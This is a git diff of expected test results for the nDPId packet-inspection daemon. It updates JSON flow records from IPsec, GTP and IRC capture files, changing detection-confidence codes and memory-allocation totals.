-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":51444,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763512822,"flow_last_seen":946763512882,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":6692,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1156,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":56312,"flow_avg_l4_payload_len":625,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":291,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":139412,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":33856,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":8164,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":32620,"flow_avg_l4_payload_len":543,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763512920,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.130","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.226","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":51444,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.227","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":11496,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":7664,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946763512822,"flow_last_seen":946763512882,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1108,"flow_tot_l4_payload_len":6692,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.194","src_port":41618,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1156,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946763527783,"flow_last_seen":946763527783,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":488,"flow_tot_l4_payload_len":2206,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":946763527783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":42593,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1080,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":1080,"packets-processed":1080,"total-skipped-flows":0,"total-l4-payload-len":535322,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":36,"total-detection-updates":0,"total-updates":12,"current-active-flows":0,"total-active-flows":36,"total-idle-flows":36,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":946763527783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1080/1080 @@ -247,9 +247,9 @@ ~~ total active/idle flows...: 36/36 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5937919 bytes -~~ total memory freed........: 5937919 bytes -~~ total allocations/frees...: 119336/119336 +~~ total memory allocated....: 6071553 bytes +~~ total memory freed........: 6071553 bytes +~~ total allocations/frees...: 122098/122098 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 1561 chars diff --git a/test/results/ipv6_in_gtp.pcap.out b/test/results/ipv6_in_gtp.pcap.out index f4fb539e5..318ea22f2 100644 --- a/test/results/ipv6_in_gtp.pcap.out +++ b/test/results/ipv6_in_gtp.pcap.out @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 193 chars ~~ json string max len.......: 558 chars diff --git a/test/results/irc.pcap.out b/test/results/irc.pcap.out index e03b3af39..b387ef3fa 100644 --- a/test/results/irc.pcap.out +++ b/test/results/irc.pcap.out @@ -4,8 +4,8 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} -00909{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": 